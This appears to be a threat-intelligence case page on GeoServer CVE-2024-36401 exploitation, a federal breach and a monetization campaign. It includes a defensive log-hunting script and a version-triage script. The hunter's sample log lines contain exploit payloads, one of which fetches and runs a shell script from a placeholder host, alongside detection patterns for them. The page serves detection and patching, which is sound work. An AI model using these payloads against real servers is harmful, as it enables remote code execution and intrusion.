Member types: Vulnerability, Campaign, Incident
GeoServer exploitation, federal breach, and monetization activity
Updated 12.12.2025 07:01
Case score 68
Score breakdown
- Total: 68
- Lead score: 61
- Support bonus: +7 / 20
- Scoring support: 3
- Context members: 0
Top contributors
- Vulnerability (base): Anchors the case in active exploitation of **CVE-2024-36401** in **GeoServer** and the resulting federal breach.
- Campaign (support): Shows separate **CVE-2024-36401** abuse against internet-exposed GeoServer instances for low-noise monetization.
- Incident (support): Provides confirmed fallout from **CVE-2024-36401** exploitation, including lateral movement and web shell use.
- Vulnerability (support): Adds later **GeoServer** exploitation pressure through **CVE-2025-58360** and its KEV listing.
Members 4
Latest activity 12.12.2025 07:01
Status flags
- Active exploitation
- Public PoC/exploit reported
- KEV: listed in CISA KEV
- Patch available
First seen 23.08.2025 10:38
Last seen 12.12.2025 07:01
Overview
**CVE-2024-36401** in **GeoServer** is an unauthenticated remote code execution flaw: OGC request property names were handed to the GeoTools library, which evaluated them as XPath expressions, so an attacker-supplied property name could execute arbitrary code on the server. The upstream fix shipped in 2.23.6, 2.24.4 and 2.25.2, and the flaw moved from patch release to active exploitation, with CISA later tying an unpatched GeoServer instance to a federal breach and a separate campaign using the same flaw to monetize exposed servers. The federal intrusion stayed active for about three weeks before EDR alerted, and the attackers expanded from GeoServer into additional internal systems.
A later KEV listing for **CVE-2025-58360** in **GeoServer** shows the product remains under sustained remediation pressure. Available evidence does not show that the newer XXE flaw was used in the federal breach, and exposure across GeoServer deployments is not quantified.
In the federal case, CISA disclosed that an unnamed U.S. federal civilian executive branch agency was breached through an unpatched, internet-facing GeoServer instance; because **CVE-2024-36401** is reachable without credentials, that single exposed instance was enough for initial access. The intrusion remained active for about three weeks before EDR alerted on suspicious activity. The same flaw also powered a separate campaign that turned internet-facing deployments into monetized infrastructure.
The attackers used Burp Suite to find exposed systems, moved from one GeoServer into another, and then expanded to a web server and an SQL server. During the intrusion they dropped web shells such as China Chopper, brute-forced passwords, attempted **CVE-2016-5195** (Dirty COW, a Linux kernel privilege escalation) to escalate privileges, and proxied command-and-control traffic through Stowaway, a multi-hop proxy tool. Since the exploit runs commands from inside the GeoServer process, unexpected child processes of that Java service and full request logs on the server itself are the earlier signals; the EDR alert that ended the three-week dwell fired on post-exploitation activity.
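A hunt for the initial exploitation request in GeoServer access logs, added here as an illustration; it is not code from the page, from CISA or from the GeoServer project. It assumes combined-log-format lines and relies on the publicly documented shape of CVE-2024-36401 requests: an OGC parameter such as `valueReference`, `propertyName` or `CQL_FILTER` carrying a Java-calling XPath function like `exec(java.lang.Runtime.getRuntime(), ...)`. The log lines, IP addresses, timestamps and user agents are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Jul/2024:03:14:07 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'id') HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [11/Jul/2024:03:14:09 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec%28java.lang.Runtime.getRuntime%28%29%2C%27curl%20http%3A%2F%2F198.51.100.7%2Fx.sh%7Csh%27%29 HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.20 - - [11/Jul/2024:03:15:00 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetFeature&typeNames=sf:archsites&propertyName=NAME HTTP/1.1" 200 9210 "-" "QGIS/3.34"
198.51.100.21 - - [11/Jul/2024:03:16:00 +0000] "GET /geoserver/wms?service=WMS&version=1.3.0&request=GetMap&layers=topp:states&CQL_FILTER=STATE_NAME%3D%27Texas%27&width=256&height=256&bbox=-180,-90,180,90&crs=EPSG:4326&format=image/png HTTP/1.1" 200 44120 "-" "Leaflet"
203.0.113.10 - - [11/Jul/2024:03:17:42 +0000] "POST /geoserver/wfs HTTP/1.1" 200 612 "-" "python-requests/2.31"
"""

# Combined-log-format line: ip ident user [ts] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# OGC KVP parameters whose values GeoServer hands to the property/filter evaluator;
# these are the carriers used by the public CVE-2024-36401 PoCs (assumption: the
# list is the commonly reported one, not exhaustive). GeoServer parses KVP names
# case-insensitively, so we compare lower-cased.
EVAL_PARAMS = {"valuereference", "propertyname", "cql_filter", "filter", "sortby"}

# Strings a legitimate property name or CQL filter never contains.
EXEC_RE = re.compile(r"java\.lang\.Runtime|getRuntime\s*\(|\bexec\s*\(|ProcessBuilder", re.I)


def hunt(log_text):
    """Return findings (dicts) for likely CVE-2024-36401 exploitation attempts."""
    findings = []
    hit_ips = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, target = m["ip"], m["ts"], m["method"], m["target"]
        parts = urlsplit(target)
        if not parts.path.startswith("/geoserver/"):
            continue
        # parse_qs percent-decodes, so an encoded payload is inspected in the clear.
        params = parse_qs(parts.query, keep_blank_values=True)
        matched = False
        for name, values in params.items():
            if name.lower() not in EVAL_PARAMS:
                continue
            for value in values:
                if EXEC_RE.search(value):
                    findings.append({"ip": ip, "ts": ts, "param": name,
                                     "payload": value, "reason": "xpath-exec"})
                    hit_ips.add(ip)
                    matched = True
        # Access logs do not carry POST bodies (the XML form of the same request), so a
        # later POST to the service from an IP that already sent an exploit string is
        # flagged for retrieval of full request logs rather than judged here.
        if not matched and method == "POST" and ip in hit_ips:
            findings.append({"ip": ip, "ts": ts, "param": None,
                             "payload": None, "reason": "followup-post"})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["reason"], f["param"], f["payload"])
```

The benign GetFeature and GetMap lines from the GIS clients do not fire, the two GetPropertyValue requests do, and the encoded second payload is reported decoded, which is the form an analyst needs for the next pivot (the download host). Because GeoServer also accepts the same request as an XML POST body, the access-log heuristic is a starting point, not a complete detection; the follow-up flag marks where request-body logging has to take over.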
In a separate GeoServer exploitation campaign observed since early March 2025, operators used **CVE-2024-36401** against internet-exposed instances and delivered customized executables from adversary-controlled servers, including a private transfer.sh instance. Because the goal was quiet monetization rather than disruption, host impact and therefore alert volume stayed low, so exposure and version checks rather than impact are the practical way to find affected servers. CISA also added **CVE-2025-58360** in GeoServer to the KEV catalog after evidence of active exploitation, with fixed releases available in **2.25.6, 2.26.2, 2.27.0, 2.28.0, and 2.28.1**.
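A version triage over a GeoServer inventory, added as an example and not taken from the page or from the GeoServer project. The fixed releases for CVE-2025-58360 are the ones listed above; the fixed releases for CVE-2024-36401 (2.23.6, 2.24.4, 2.25.2) are taken from the upstream GeoServer advisory and are an assumption of this example, as are the host names and versions in the sample inventory.

```python
import re

# Minimum fixed release per minor branch. CVE-2025-58360 entries are from the case
# text above; CVE-2024-36401 entries are assumed from the upstream advisory.
FIXED_RELEASES = {
    "CVE-2024-36401": ["2.23.6", "2.24.4", "2.25.2"],
    "CVE-2025-58360": ["2.25.6", "2.26.2", "2.27.0", "2.28.0", "2.28.1"],
}

# Constructed inventory (host -> version string as shown on the GeoServer welcome page).
SAMPLE_INVENTORY = {
    "gis-01": "2.25.1",
    "gis-02": "2.24.4",
    "gis-03": "2.27.0",
    "gis-04": "2.22.5",
    "gis-05": "2.25.6",
}

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)")


def parse_version(text):
    """'2.25.1' or '2.25.1-SNAPSHOT' -> (2, 25, 1); anything else is an error."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised GeoServer version: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(version, fixed_releases):
    """True if `version` predates the fix on its own minor branch.

    A branch with no fixed release is either older than every fixed branch
    (end of life, still vulnerable) or newer than all of them (fix already
    included), so comparing the branch against the oldest fixed branch decides it.
    """
    v = parse_version(version)
    fixes = sorted(parse_version(f) for f in fixed_releases)
    same_branch = [f for f in fixes if f[:2] == v[:2]]
    if same_branch:
        return v < same_branch[0]
    return v[:2] < fixes[0][:2]


def triage(inventory):
    """host -> list of KEV-listed GeoServer CVEs the installed version is missing fixes for."""
    return {
        host: [cve for cve, fixes in FIXED_RELEASES.items() if is_affected(version, fixes)]
        for host, version in inventory.items()
    }


if __name__ == "__main__":
    for host, cves in triage(SAMPLE_INVENTORY).items():
        print(host, SAMPLE_INVENTORY[host], "affected by:" if cves else "clean", *cves)
```

Note the two different shapes of "affected": gis-01 is on a supported branch and simply one release short, while gis-02 is fully patched for CVE-2024-36401 but sits on a branch that never received the CVE-2025-58360 fix, so it needs a branch upgrade rather than a point release.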